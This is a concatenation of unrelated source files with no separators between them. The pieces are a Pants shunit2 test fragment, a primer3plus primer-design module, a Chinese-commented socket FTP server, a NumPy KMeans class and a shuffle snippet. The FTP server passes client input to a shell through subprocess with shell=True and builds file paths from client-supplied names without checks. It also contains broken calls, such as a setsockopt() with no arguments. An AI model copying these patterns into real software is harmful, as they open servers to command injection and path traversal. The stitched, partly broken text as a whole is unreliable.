extra_args=['--test-extra-env-vars=["SOME_VAR=some_value", "OTHER_VAR"]'], env={"OTHER_VAR": "other_value"}, ) assert result.exit_code == 0 assert "Ran 1 test.\n\nOK" in result.stdout def test_runtime_package_dependency(rule_runner: PythonRuleRunner) -> None: rule_runner.write_files( { "src/py/main.py": "", "src/py/BUILD": dedent( """\ python_sources() pex_binary(name='main', entry_point='main.py') """ ), "tests.sh": dedent( """\ #!/usr/bin/bash testArchive() { assertTrue "[[ -f src.py/main.pex ]]" # Ensure the pex's dependencies are not included, only the final result. assertFalse "[[ -f src/py/main.py ]]" } """ ), "BUILD": "shunit2_tests(name='t', runtime_package_dependencies=['src/py:main'])", } ) tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="tests.sh")) result = run_shunit2(rule_runner, tgt) assert result.exit_code == 0 assert "Ran 1 test.\n\nOK" in result.stdout def test_determine_shell_runner(rule_runner: PythonRuleRunner) -> None: addr = Address("", target_name="t") fc = FileContent("tests.sh", b"#!/usr/bin/env sh") rule_runner.set_options([], env_inherit={"PATH"}) # If `shell` field is not set, read the shebang. result = rule_runner.request( Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField(None, addr))] ) assert result.shell == Shunit2Shell.sh # The `shell` field overrides the shebang. result = rule_runner.request( Shunit2Runner, [Shunit2RunnerRequest(addr, fc, Shunit2ShellField("bash", addr))] ) assert result.shell == Shunit2Shell.bash # Error if not set. with pytest.raises(ExecutionError) as exc: rule_runner.request( Shunit2Runner, [ Shunit2RunnerRequest( addr, FileContent("tests.sh", b""), Shunit2ShellField(None, addr) ) ], ) assert f"Could not determine which shell to use to run shunit2 on {addr}" in str(exc.value)
/root/nfs/jooho/openshift-ansible/library/modify_yaml.py
"""Core design modules. For examples for how to use the design module, see the :doc:`Usage Docs <../usage>` For a list of design parameters available, take a look at the :ref:`BoulderIO Parameters <api_default_parameters>` .. code-block:: python # a new task design = Design() # set template sequence design.settings.template("AGGTTGCGTGTGTATGGTCGTGTAGTGTGT") # set left primer sequence design.settings.left_sequence("GTTGCGTGTGT) # set as a cloning task design.settings.as_cloning_task() # run the design task design.run() """ import re import webbrowser from typing import Any from typing import Dict from typing import List from typing import Tuple from typing import Union from warnings import warn import primer3 from .interfaces import AllParameters from .interfaces import ParameterAccessor from .results import parse_primer3_results from primer3plus.constants import DOCURL from primer3plus.exceptions import Primer3PlusException from primer3plus.exceptions import Primer3PlusRunTimeError from primer3plus.exceptions import Primer3PlusWarning from primer3plus.log import logger from primer3plus.params import BoulderIO from primer3plus.params import default_boulderio from primer3plus.utils import anneal as anneal_primer from primer3plus.utils import depreciated_warning class DesignPresets: """Interface for setting design parameters. This is typically accessed from a :class:`Design <primer3plus.Design>` instance's. :meth:`Design <primer3plus.Design.set>` method. As in: .. code-block:: design = Design() design.settings.left_sequence("AGGGAGATAGATA") design.run() """ def __init__(self, design): """Initializes a new interface from a. :class:`~primer3plus.design.Design`. :param design: The design """ self._design = design def _resolve(self): """Process any extra parameters and process BoulderIO so that it is digestable by primer3.""" if self._design.PRIMER_USE_OVERHANGS.value: self._resolve_overhangs(self._design.PRIMER_MIN_ANNEAL_CHECK.value) if self._design.PRIMER_LONG_OK.value: self._resolve_max_lengths(lim=BoulderIO.PRIMER_MAX_SIZE_HARD_LIM) self._resolve_product_sizes() if not self._design.PRIMER_USE_OVERHANGS.value: if self._design.SEQUENCE_PRIMER_OVERHANG.value: warn( Primer3PlusWarning( "{} is non-empty (value={}) but {} was False. Overhang was" " ignored".format( self._design.SEQUENCE_PRIMER_OVERHANG.name, self._design.SEQUENCE_PRIMER_OVERHANG.value, self._design.PRIMER_USE_OVERHANGS.name, ) ) ) if self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value: warn( Primer3PlusWarning( "{} is non-empty (value={}) but {} was False. Overhang was" " ignored".format( self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.name, self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value, self._design.PRIMER_USE_OVERHANGS.name, ) ) ) return self def _post_parse(self, pairs, explain) -> None: """Modify results from design parameters (e.g. overhangs)""" left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value for pair in pairs.values(): for x in ["LEFT", "RIGHT"]: pair[x].setdefault("OVERHANG", "") if self._design.PRIMER_USE_OVERHANGS: pair["LEFT"]["OVERHANG"] = self._design.SEQUENCE_PRIMER_OVERHANG.value pair["RIGHT"][ "OVERHANG" ] = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value if left_long_overhang: pair["LEFT"]["SEQUENCE"] = ( left_long_overhang + pair["LEFT"]["SEQUENCE"] ) pair["LEFT"]["OVERHANG"] = pair["LEFT"]["OVERHANG"][ : -len(left_long_overhang) ] pair["PAIR"]["PRODUCT_SIZE"] += len(left_long_overhang) loc = pair["LEFT"]["location"] pair["LEFT"]["location"] = [ loc[0] - len(left_long_overhang), len(pair["LEFT"]["SEQUENCE"]), ] if right_long_overhang: pair["RIGHT"]["SEQUENCE"] = ( right_long_overhang + pair["RIGHT"]["SEQUENCE"] ) pair["RIGHT"]["OVERHANG"] = pair["RIGHT"]["OVERHANG"][ : -len(right_long_overhang) ] pair["PAIR"]["PRODUCT_SIZE"] += len(right_long_overhang) loc = pair["RIGHT"]["location"] pair["RIGHT"]["location"] = [ loc[0] + len(right_long_overhang), len(pair["RIGHT"]["SEQUENCE"]), ] def _interval_from_sequences( self, template: str, target: str ) -> Union[None, Tuple[int, int]]: if isinstance(target, str): matches = self._get_index_of_match(template, target) if not matches: print("Target not in template") return None if len(matches) > 1: print("More than one target found") return None return matches[0] @staticmethod def _get_index_of_match(template: str, sequence: str) -> List[Tuple[int, int]]: matches = [] for m in re.finditer(sequence, template, re.IGNORECASE): matches.append((m.start(0), m.end(0))) return matches def update(self, update: Dict[str, Any]): """Update an arbitrary parameter.""" self._design.params.update(update) return self def task(self, task: str) -> "DesignPresets": """This tag tells primer3 what task to perform. http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK :param task: the task name :return self """ self.update({"PRIMER_TASK": task}) return self def as_cloning_task(self) -> "DesignPresets": """Set the design as a cloning task. http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK :return: self """ return self.task("pick_cloning_primers") def as_generic_task(self) -> "DesignPresets": """Set the design as a generic task. http://primer3.ut.ee/primer3web_help.htm#PRIMER_TASK :return: self """ return self.task("generic") def template(self, template: str) -> "DesignPresets": """Set the template sequence for the design. This sets the 'SEQUENCE_TEMPLATE' parameter. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE :param template: the template sequence :return: self """ self.update({"SEQUENCE_TEMPLATE": template}) return self # TODO: set_iterations, set_num_return, set_force_return, set_gradient def primer_num_return(self, n: int) -> "DesignPresets": """Set the number of primers to return for the design task. http://primer3.ut.ee/primer3web_help.htm#PRIMER_NUM_RETURN :param n: number of primers to return :return: self """ return self.update({"PRIMER_NUM_RETURN": n}) def product_size( self, interval: Union[Tuple[int, int], List[Tuple[int, int]]], opt=None ) -> "DesignPresets": """Set the product size. Optionally include the optimal size. http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_SIZE_RANGE http://primer3.ut.ee/primer3web_help.htm#PRIMER_PRODUCT_OPT_SIZE :param interval: a tuple of <min>,<max> or a list of such tuples :param opt: optional product size as an int. :return: self """ if isinstance(interval, tuple): interval = [interval] if opt is not None: return self.update( {"PRIMER_PRODUCT_SIZE_RANGE": interval, "PRIMER_PRODUCT_OPT_SIZE": opt} ) return self.update({"PRIMER_PRODUCT_SIZE_RANGE": interval}) def pair_region_list( self, region_list: List[Tuple[int, int, int, int]] ) -> "DesignPresets": """The list of regions from which to design primers. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_PAIR_OK_REGION_LIST :param region_list: list of regions :return: self """ return self.update({"SEQUENCE_PRIMER_PAIR_OK_REGION_LIST": region_list}) def left_sequence(self, primer: str) -> "DesignPresets": """The sequence of a left primer to check and around which to design right primers and optional internal oligos. Must be a substring of SEQUENCE_TEMPLATE. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER :param primer: the primer sequence :return: self """ return self.update({"SEQUENCE_PRIMER": primer, "PRIMER_PICK_RIGHT_PRIMER": 1}) def right_sequence(self, primer: str) -> "DesignPresets": """The sequence of a right primer to check and around which to design left primers and optional internal oligos. Must be a substring of the reverse strand of SEQUENCE_TEMPLATE. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER :param primer: the primer sequence :return: self """ return self.update( {"SEQUENCE_PRIMER_REVCOMP": primer, "PRIMER_PICK_LEFT_PRIMER": 1} ) @staticmethod def _trim_long(overhang: str, anneal: str, lim: int) -> Tuple[str, str, str]: """Fix the overhang and anneal from the hardcoded BoulderIO primer lim.""" return overhang, anneal[:-lim], anneal[-lim:] def _get_left_overhang(self, min_primer_anneal: int): left = self._design.SEQUENCE_PRIMER.value if left: fwd, _ = anneal_primer( self._design.SEQUENCE_TEMPLATE.value, [left], n_bases=min_primer_anneal ) if len(fwd) == 0: raise Primer3PlusRunTimeError("No annealing found for left sequence.") elif len(fwd) > 1: raise Primer3PlusRunTimeError( "More than one annealing found for left sequence." ) overhang = fwd[0]["overhang"] anneal = fwd[0]["anneal"] return overhang, anneal else: return "", left def _get_right_overhang(self, min_primer_anneal: int): right = self._design.SEQUENCE_PRIMER_REVCOMP.value if right: _, rev = anneal_primer( self._design.SEQUENCE_TEMPLATE.value, [right], n_bases=min_primer_anneal ) if len(rev) == 0: raise Primer3PlusRunTimeError("No annealing found for right sequence.") elif len(rev) > 1: raise Primer3PlusRunTimeError( "More than one annealing found for right " "sequence {}.".format(self._design.SEQUENCE_PRIMER_REVCOMP) ) overhang = rev[0]["overhang"] anneal = rev[0]["anneal"] return overhang, anneal else: return "", right def left_overhang(self, overhang: str) -> "DesignPresets": """Sets the left overhang sequence for the primer. This overhang will. *always* be in the overhang sequence regardless of other parameters. If using a primer that anneals with an overhang, this value will be appended to the 5' end of the overhang. :param overhang: overhang sequence :return: self """ return self.update({"SEQUENCE_PRIMER_OVERHANG": overhang}) def right_overhang(self, overhang: str) -> "DesignPresets": """Sets the right overhang sequence for the primer. This overhang will. *always* be in the overhang sequence regardless of other parameters. If using a primer that anneals with an overhang, this value will be appended to the 5' end of the overhang. :param overhang: overhang sequence :return: self """ return self.update({"SEQUENCE_PRIMER_REVCOMP_OVERHANG": overhang}) def use_overhangs(self, b: bool = True) -> "DesignPresets": """Set the BoulderIO to process overhangs. :param b: boolean to set :return: self """ return self.update({"PRIMER_USE_OVERHANGS": b}) def long_ok(self, b: bool = True) -> "DesignPresets": """Set the BoulderIO to process long primers. :param b: boolean to set :return: self """ return self.update({"PRIMER_LONG_OK": b}) def _resolve_product_sizes(self): """If there are long primers being used, the product_size is no longer valid as the trimmed sequence is no longer represented in the originally provided product size. This re-adjusts the product size to correspond the adjusted parameters. """ # adjust product size range left_long_overhang = self._design._SEQUENCE_LONG_OVERHANG.value right_long_overhang = self._design._SEQUENCE_REVCOMP_LONG_OVERHANG.value product_sizes = self._design.PRIMER_PRODUCT_SIZE_RANGE.value x = len(left_long_overhang) + len(right_long_overhang) if isinstance(product_sizes[0], tuple): new_product_sizes = [] for size in product_sizes: new_product_sizes.append((size[0] - x, size[1] - x)) self._design.PRIMER_PRODUCT_SIZE_RANGE.value = new_product_sizes else: size = self._design.PRIMER_PRODUCT_SIZE_RANGE.value self._design.PRIMER_PRODUCT_SIZE_RANGE.value = [size[0] - x, size[1] - x] def _resolve_max_lengths(self, lim: int): """Fixes the annealing and overhang sequences for annealing sequences for primers over the :attr:`BoulderIO. <primer3plus.paramsBoulderIO.PRIMER_MAX_SIZE_HARD_LIM>`. Should always be run *after* :meth:`_resolve_overhangs`. """ left_anneal = self._design.SEQUENCE_PRIMER.value right_anneal = self._design.SEQUENCE_PRIMER_REVCOMP.value left_over = self._design.SEQUENCE_PRIMER_OVERHANG.value right_over = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value left_over, left_long_overhang, left_anneal = self._trim_long( left_over, left_anneal, lim=lim ) right_over, right_long_overhang, right_anneal = self._trim_long( right_over, right_anneal, lim=lim ) self.left_overhang(left_over + left_long_overhang) self.right_overhang(right_over + right_long_overhang) # save the sequences that were trimmed # TODO: will need to re-add these in the results in overhang, product size, and anneal # TODO: adjust the product_size # TODO: adjust any other regions # TODO: re-adjust tm and add any warnings # save values for long overhangs self._left_long_overhang(left_long_overhang) self._right_long_overhang(right_long_overhang) self.left_sequence(left_anneal) self.right_sequence(right_anneal) def _left_long_overhang(self, x): self.update({"_SEQUENCE_LONG_OVERHANG": x}) def _right_long_overhang(self, x): self.update({"_SEQUENCE_REVCOMP_LONG_OVERHANG": x}) def _resolve_overhangs(self, min_primer_anneal: int): """Sets the annealing and overhang sequences.""" left_over, left_anneal = self._get_left_overhang(min_primer_anneal) _loverhang = self._design.SEQUENCE_PRIMER_OVERHANG.value if _loverhang: left_over = _loverhang + left_over # raise ValueError( # "Left overhang already set to '{}'.".format(_loverhang) # ) right_over, right_anneal = self._get_right_overhang(min_primer_anneal) _roverhang = self._design.SEQUENCE_PRIMER_REVCOMP_OVERHANG.value if _roverhang: right_over = _roverhang + right_over # raise ValueError( # "Right overhang already set to '{}'.".format(_roverhang) # ) self.left_overhang(left_over) self.right_overhang(right_over) self.left_sequence(left_anneal) self.right_sequence(right_anneal) def pick_left_only(self) -> "DesignPresets": """Design only the left primer. http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER :return: self """ return self.update( {"PRIMER_PICK_LEFT_PRIMER": 1, "PRIMER_PICK_RIGHT_PRIMER": 0} ) def pick_right_only(self) -> "DesignPresets": """Design only the right primer. http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER :return: self """ return self.update( {"PRIMER_PICK_LEFT_PRIMER": 0, "PRIMER_PICK_RIGHT_PRIMER": 1} ) def internal_sequence(self, primer: str) -> "DesignPresets": """The sequence of an internal oligo to check and around which to design left and right primers. Must be a substring of SEQUENCE_TEMPLATE. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INTERNAL_OLIGO http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_INTERNAL_OLIGO :param primer: :type primer: :return: :rtype: """ return self.update( {"SEQUENCE_INTERNAL_OLIGO": primer, "PRIMER_PICK_INTERNAL_OLIGO": 1} ) def primers(self, p1: str, p2: str) -> "DesignPresets": """Set the left and right primer sequences. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_RIGHT_PRIMER http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_PRIMER_REVCOMP http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_LEFT_PRIMER :param p1: :param p2: :return: """ if p1: self.left_sequence(p1) if p2: self.right_sequence(p2) return self def primers_with_overhangs(self, p1: str, p2: str) -> "DesignPresets": if p1: self.left_sequence_with_overhang(p1) if p2: self.right_sequence_with_overhang(p2) return self def _parse_interval( self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]] ) -> List[Tuple[int, int]]: if isinstance(interval, str): interval = self._interval_from_sequences( self._design.params["SEQUENCE_TEMPLATE"], interval ) if isinstance(interval, tuple): interval = [interval] return interval def included(self, interval: Union[str, Tuple[int, int]]) -> "DesignPresets": """Specify interval from which primers must be selected. A sub-region of the given sequence in which to pick primers. For example, often the first dozen or so bases of a sequence are vector, and should be excluded from consideration. The value for this parameter has the form. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_INCLUDED_REGION <start>,<length> where <start> is the index of the first base to consider, and <length> is the number of subsequent bases in the primer-picking region. :param interval: One of the following: the sequence of the target region, a tuple of the interval of <start>,<length> or a str :return: self """ if isinstance(interval, str): interval = self._interval_from_sequences( self._design.params["SEQUENCE_TEMPLATE"], interval ) if not len(interval) == 2 or ( not isinstance(interval, tuple) and not isinstance(interval, list) ): raise TypeError( "Expect an tuple or list of length 2 but found {}".format(interval) ) interval = list(interval) return self.update({"SEQUENCE_INCLUDED_REGION": interval}) def target( self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]] ) -> "DesignPresets": """Specify the interval that designed primers must flank. If one or more targets is specified then a legal primer pair must flank at least one of them. A target might be a simple sequence repeat site (for example a CA repeat) or a single-base-pair polymorphism, or an exon for resequencing. The value should be a space-separated list of. <start>,<length> pairs where <start> is the index of the first base of a target,and <length> is its length. See also PRIMER_INSIDE_PENALTY, PRIMER_OUTSIDE_PENALTY. PRIMER_TASK=pick_sequencing_primers. See PRIMER_TASK for more information. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TARGET :param interval: One of the following: the sequence of the target region, a tuple of the interval of <start>,<length>, or a list of tuples of <start>,<length> :return self """ return self.update({"SEQUENCE_TARGET": self._parse_interval(interval)}) def excluded( self, interval: Union[str, Tuple[int, int], List[Tuple[int, int]]] ) -> "DesignPresets": """Primers and oligos may not overlap any region specified in this tag. The associated value must be a space-separated list of <start>,<length> pairs where <start> is the index of the first base of the excluded region, and <length> is its length. This tag is useful for tasks such as excluding regions of low sequence quality or for excluding regions containing repetitive elements such as ALUs or LINEs. http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_TEMPLATE http://primer3.ut.ee/primer3web_help.htm#SEQUENCE_EXCLUDED_REGION :param interval: One of the following: the sequence of the target region, a tuple of the interval of <start>,<length>, or a list of tuples of <start>,<length> :return: self """ return self.update({"SEQUENCE_EXCLUDED_REGION": self._parse_interval(interval)}) def pick_anyway(self, b=1) -> "DesignPresets": """If true use primer provided in SEQUENCE_PRIMER, SEQUENCE_PRIMER_REVCOMP, or SEQUENCE_INTERNAL_OLIGO even if it violates specific constraints. http://primer3.ut.ee/primer3web_help.htm#PRIMER_PICK_ANYWAY :param b: default True :return self """ return self.update({"PRIMER_PICK_ANYWAY": b}) def clip(x, mn, mx): return max(min(x, mx), mn) class DesignBase: """Base design.""" DEFAULT_PARAMS = default_boulderio #: default parameters DEFAULT_GRADIENT = dict( PRIMER_MAX_SIZE=(1, DEFAULT_PARAMS["PRIMER_MAX_SIZE"], 36), PRIMER_MIN_SIZE=(-1, 16, DEFAULT_PARAMS["PRIMER_MAX_SIZE"]), PRIMER_MAX_TM=(1, DEFAULT_PARAMS["PRIMER_MAX_SIZE"], 80), PRIMER_MIN_TM=(-1, 48, DEFAULT_PARAMS["PRIMER_MIN_TM"]), PRIMER_MAX_HAIRPIN_TH=(1, DEFAULT_PARAMS["PRIMER_MAX_HAIRPIN_TH"], 60), ) #: the default gradient to use for the :meth:`Design.run_and_optimize` method. _CHECK_PRIMERS = "check_primers" _GENERIC = "generic" _PICK_PRIMER_LIST = "pick_primer_list" _PICK_SEQUENCING_PRIMERS = "pick_sequencing_primers" _PICK_CLONING_PRIMERS = "pick_cloning_primers" _PICK_DISCRIMINATIVE_PRIMERS = "pick_discriminative_primers" def __init__( self, gradient: Dict[ str, Tuple[Union[float, int], Union[float, int], Union[float, int]] ] = None, params: BoulderIO = None, quiet_runtime: bool = False, ): """Initializes a new design. :param gradient: the design gradient. :param quiet_runtime: if True will siliently ignore any runtime errors. """ if params is None: params = self.DEFAULT_PARAMS.copy() self.params = params self.logger = logger(self) self.gradient = gradient self.quiet_runtime = quiet_runtime def _raise_run_time_error(self, msg: str) -> Primer3PlusRunTimeError: """Raise a Primer3PlusRunTime exception. If parameters are named in the msg, print off some debugging information at the end of the message. :param msg: the error msg :return: the run time exception """ parameter_explain = set() for name, value in self.params._params.items(): if name in msg: parameter_explain.add("\t" + str(value)) parameter_explain = sorted(parameter_explain) return Primer3PlusRunTimeError(msg + "\n" + "\n".join(parameter_explain)) def _run(self, params: BoulderIO = None) -> Tuple[List[Dict], List[Dict]]: """Design primers. Optionally provide additional parameters. :param params: :return: results """ if params is None: params = self.params try: res = primer3.bindings.designPrimers(params._sequence(), params._globals()) except OSError as e: if not self.quiet_runtime: raise self._raise_run_time_error(str(e)) from e else: return {}, {"PRIMER_ERROR": str(e)} except Primer3PlusRunTimeError as e: if not self.quiet_runtime: raise self._raise_run_time_error(str(e)) from e else: return {}, {"PRIMER_ERROR": str(e)} except Primer3PlusException as e: raise self._raise_run_time_error(str(e)) from e pairs, explain = parse_primer3_results(res) self.settings._post_parse(pairs, explain) return pairs, explain def run(self) -> Tuple[List[Dict], List[Dict]]: """Design primers. Optionally provide additional parameters. :param params: :return: results """ return self._run() def run_and_optimize( self, max_iterations, params: BoulderIO = None, gradient: Dict[ str, Tuple[Union[float, int], Union[float, int], Union[float, int]] ] = None, run_kwargs: dict = None, ) -> Tuple[List[dict], List[dict]]: """Design primers and relax constraints. If primer design is unsuccessful, relax parameters as defined in primer3plust.Design.DEFAULT_GRADIENT. Repeat for the specified number of max_iterations. :param max_iterations: the max number of iterations to perform relaxation :param params: optional parameters to provide :param gradient: optional gradient to provide. If not provided, Design.DEFAULT_GRADIENT will be used. The gradient is a dictionary off 3 tuples, the step the min and the max. :return: results """ if gradient is None: gradient = self.gradient or self.DEFAULT_GRADIENT if params is None: params = self.params pairs, explain = self._run(params) i = 0 while i < max_iterations and len(pairs) == 0: i += 1 update = self._update_dict(params, gradient=gradient) if update: self.logger.info("Updated: {}".format(update)) else: self.logger.info("Reached end of gradient.") break self.params.update(update) pairs, explain = self._run(params) return pairs, explain @staticmethod def _update_dict(params, gradient): update = {} for param_key, gradient_tuple in gradient.items(): delta, mn, mx = gradient_tuple try: val = params[param_key] + delta val = clip(val, mn, mx) if params[param_key] != val: update[param_key] = val except Exception as e: raise e return update @staticmethod def open_help(): """Open the documentation help in a new browser tab.""" webbrowser.open(DOCURL) def copy(self): """Copy this design and its parameters.""" designer = self.__class__() designer.params = self.params.copy() def __copy__(self): return self.copy() class RestoreAfterRun: """Class to restore boulderio to its original parameters after a run.""" def __init__(self, boulderio): self.params = boulderio def __enter__(self): for v in self.params._params.values(): v.hold_restore() def __exit__(self, a, b, c): for v in self.params._params.values(): v.restore() class Design(DesignBase, AllParameters): def __init__(self): """Initialize a new design. Set parameters using. :attr:`Design.settings`, which returns an instance of :class:`DesignPresets <primer3plus.design.DesignPresets>`. Alternatively, parameters can be accessed more directly using the name of the parameter descriptor. For a list of parameters available, see :ref:`BoulderIO Parameters <api_default_parameters>`. .. code-block:: design = Design() design.settings.template("AGGCTGTAGTGCTTGTAGCTGGTTGCGTTACTGTG") design.settings.left_sequence("GTAGTGCTTGTA") design.SEQUENCE_ID.value = "MY ID" design.run() """ super().__init__() self._settings = DesignPresets(self) def set(self, key, value): self.params.defs[key].value = value def get(self, key): return self.params.defs[key] @property def settings(self) -> "DesignPresets": """Return the :class:`DesignPresets <primer3plus.design.DesignPresets>` instance for this design.""" return self._settings @property def presets(self): depreciated_warning("'presets' has been renamed to 'settings'") return self.settings def update(self, data: Dict[str, Any]): """Update an arbitrary parameter.""" return self.params.update(data) def run(self) -> Tuple[List[Dict], List[Dict]]: """Design primers. Optionally provide additional parameters. :param params: :return: results """ with RestoreAfterRun(self.params): self.settings._resolve() return super()._run(None) def run_and_optimize( self, max_iterations, params: BoulderIO = None, gradient: Dict[ str, Tuple[Union[float, int], Union[float, int], Union[float, int]] ] = None, pick_anyway: bool = False, ) -> Tuple[List[dict], List[dict]]: """Design primers. If primer design is unsuccessful, relax parameters as defined in primer3plust.Design.DEFAULT_GRADIENT. Repeat for the specified number of max_iterations. :param max_iterations: the max number of iterations to perform relaxation :param params: optional parameters to provide :param gradient: optional gradient to provide. If not provided, Design.DEFAULT_GRADIENT will be used. The gradient is a dictionary off 3 tuples, the step the min and the max. :param pick_anyway: if set to True, if the optimization finds no pairs, pick a pair anyways. :return: results """ with RestoreAfterRun(self.params): self.settings._resolve() pairs, explain = super().run_and_optimize(max_iterations) if pick_anyway and not pairs: self.settings.pick_anyway(1) pairs, explain = super().run() return pairs, explain def new(params=None): """Start a new design.""" design = Design() if params: design.params.update(params)
#!/usr/bin/python3 # -*- coding: utf-8 -*- from socket import * from conf.settings import * import configparser import struct import json import time import sys import hashlib import subprocess class FtpServer: address_family = AF_INET socket_type = SOCK_STREAM def __init__(self, server_address): """ 初始化信息 :param server_address: ("ip地址",端口) """ self.server_address = server_address self.phone = socket(self.address_family, self.socket_type) if IS_REUSE: self.phone.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) self.phone.setsockopt() self.phone.bind(SERVER_IP_PORT) self.phone.listen(MAX_LISTEN) def login(self, conn, date_dic): config = configparser.ConfigParser() config.read(USER_INFO, encoding='utf-8') print(date_dic) in_name = date_dic["username"] in_password = date_dic["password"] if config.has_section(in_name): md5_pwd =hashlib.md5() md5_pwd.update(in_password.encode(encoding)) if md5_pwd.hexdigest() == config.get(in_name, "Password"): flag = 0 self.user_name = in_name self.home = os.path.join(BASE_HOME, in_name) self.cur_path = os.path.join(BASE_HOME, in_name) self.Quotation = config.get(in_name, "Quotation") else: flag = 4 # "密码错误" else: flag = 5 # "用户不存在" flag_len = struct.pack("l", flag) # flag_len bytes conn.send(flag_len) if flag == 0: return True def cd(self, conn, cmd): if cmd[1] == ".": conn.send(self.cur_path.encode(encoding=encoding)) elif cmd[1] == "..": if self.cur_path == self.home: conn.send(self.cur_path.encode(encoding=encoding)) else: self.cur_path = os.path.dirname(self.cur_path) conn.send(self.cur_path.encode(encoding=encoding)) else: if os.path.exists(os.path.join(self.cur_path, cmd[1])): self.cur_path = os.path.join(self.cur_path, cmd[1]) conn.send(self.cur_path.encode(encoding=encoding)) else: conn.send("路径不存在".encode(encoding)) def get(self, conn, cmd): filename = cmd[1] # 3、以读的方式打开文件,读取文件内容发送给客户端 # 第一步:制作固定长度的报头 header_dic = { 'filename': filename, # 'filename':'1.mp4' 'file_size': os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename)) } header_json = json.dumps(header_dic) print(header_json) header_bytes = header_json.encode(encoding) # 第二步:先发送报头的长度 conn.send(struct.pack('l', len(header_bytes))) # 第三步:再发报头 conn.send(header_bytes) # 第四步:再发送真实的数据 with open(os.path.join(BASE_HOME, self.user_name, filename), 'rb') as f: for line in f: conn.send(line) def put(self, conn, cmd): # 第一步:先收报头的长度 obj = conn.recv(4) header_size = struct.unpack('l', obj)[0] # 第二步:再收报头 header_bytes = conn.recv(header_size) # 第三步:从报头中解析出对真实数据的描述信息 header_json = header_bytes.decode('utf-8') header_dic = json.loads(header_json) total_size = header_dic['file_size'] filename = header_dic['filename'] # 配额检测 if total_size + os.path.getatime(self.home) < int(self.Quotation) * 1024 * 1024 * 1024: conn.send("1".encode(encoding)) # 第四步:接收真实的数据 if not os.path.exists(os.path.join(BASE_HOME, self.user_name, filename)): conn.send("0".encode(encoding)) with open(os.path.join(BASE_HOME, self.user_name, filename), 'wb') as f: recv_size = 0 while recv_size < total_size: line = conn.recv(1024) # 1024是一个坑 f.write(line) recv_size += len(line) else: has_rec =os.path.getsize(os.path.join(BASE_HOME, self.user_name, filename)) # print(has_rec) # 141115260 with open(os.path.join(BASE_HOME, self.user_name, filename),"ab+") as f: conn.send("1".encode(encoding)) # 续传标志 conn.send(struct.pack("l",has_rec)) # 发 传了多少 last_data = header_dic["file_size"] - has_rec#还剩多少 recv_size = 0 while recv_size < last_data: line = conn.recv(1024) # 1024是一个坑 f.write(line) recv_size += len(line) else: conn.send("0".encode(encoding)) def dir(self, conn, cmd): if len(cmd) == 1: print(cmd[0] + " " + self.cur_path) obj = subprocess.Popen(cmd[0] + " " + self.cur_path, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) msg = obj.stderr.read() + obj.stdout.read() conn.send(struct.pack("l", len(msg))) print(len(msg)) conn.send(msg) @staticmethod def __view_bar__(received, total_size): """ 打印进度条 :param received: 已经接收的大小 :param total_size: 总大小 :return: """ rate = float(received) / float(total_size) rate_num = int(rate * 100) r = '\r[%s%s]%d%%' % ("=" * rate_num, " " * (100 - rate_num), rate_num,) sys.stdout.write(r) sys.stdout.flush()
import numpy as np import itertools class KMeans: def __init__(self, n_clusters, max_iter=1000, random_seed=0): self.n_clusters = n_clusters self.max_iter = max_iter self.random_state = np.random.RandomState(random_seed) def fit(self, X): cycle = itertools.cycle(range(self.n_clusters)) self.labels_ = np.fromiter(itertools.islice(cycle, X.shape[0]), dtype=np.int) self.random_state.shuffle(self.labels_) labels_prev = np.zeros(X.shape[0]) count = 0 self.cluster_centers_ = np.zeros((self.n_clusters, X.shape[1])) while (not (self.labels_ == labels_prev).all() and count < self.max_iter): for i in range(self.n_clusters): XX = X[self.labels_ == i, :] self.cluster_centers_[i, :] = XX.mean(axis=0) dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1) labels_prev = self.labels_ self.labels_ = dist.argmin(axis=1) count += 1 def predict(self, X): dist = ((X[:, :, np.newaxis] - self.cluster_centers_.T[np.newaxis, :, :]) ** 2).sum(axis=1) labels = dist.argmin(axis=1) return labels
""" 打乱一个排好序的list对象alist? """ import random alist = [1, 2, 3, 4, 5] random.shuffle(alist) print(alist)
